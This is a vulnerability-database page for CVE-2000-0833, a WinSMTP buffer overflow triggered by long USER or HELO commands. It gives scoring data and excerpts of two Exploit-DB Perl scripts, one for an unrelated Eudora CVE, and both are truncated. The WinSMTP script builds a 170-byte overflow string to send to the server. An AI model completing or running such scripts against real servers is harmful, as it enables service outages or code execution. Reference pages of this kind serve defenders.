CVE-2000-0833
published 2000-11-14CVE-2000-0833: Buffer overflow in WinSMTP 1.06f and 2.X allows remote attackers to cause a denial of service via a long (1) USER or (2) HELO command.
PriorityP432critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
10.42%
95.2th percentile
Buffer overflow in WinSMTP 1.06f and 2.X allows remote attackers to cause a denial of service via a long (1) USER or (2) HELO command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jack_de_winter | winsmtp | — | — |
| jack_de_winter | winsmtp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Qualcomm Eudora 5 - MIME MultiPart Boundary Buffer Overflow
exploitdb·2002-08-05
CVE-2002-0833 Qualcomm Eudora 5 - MIME MultiPart Boundary Buffer Overflow
Qualcomm Eudora 5 - MIME MultiPart Boundary Buffer Overflow
---
source: https://www.securityfocus.com/bid/5397/info
A buffer overflow vulnerability has been reported in Qualcomm's Eudora mail client for Windows systems. The condition occurs if a MIME multipart boundary is of excessive length. Remote attackers may exploit this vulnerability to execute arbitrary code.
#!/usr/local/bin/perl
#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko
# http://www.jumperz.net/
#---------------------------------------------------------------------
use Socket;
$connect_host = 'mail.jumperz.net';
$port = 25;
$env_from = '[email protected]';
$env_to = '[email protected]';
$from = 'anvil@j
Exploit-DB
Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow
exploitdb·2000-09-11
CVE-2000-0833 Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow
Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow
---
source: https://www.securityfocus.com/bid/1680/info
A number of unchecked buffers exist in the SMTP and POP3 components of Jack De Winter's WinSMTP mail daemon which could lead to denial of service attacks or arbitrary code execution, depending on the data entered.
Sending a HELO command consisting of approximately 170 bytes or a USER command consisting of approximately 370 bytes will result in a Windows general protection fault error.
#!/usr/bin/perl
#
# ./$0.pl -s
# sends data to stmpd, overflowing server buffer.
#
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 170;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto =>
No writeups or analysis indexed.
2000-11-14
Published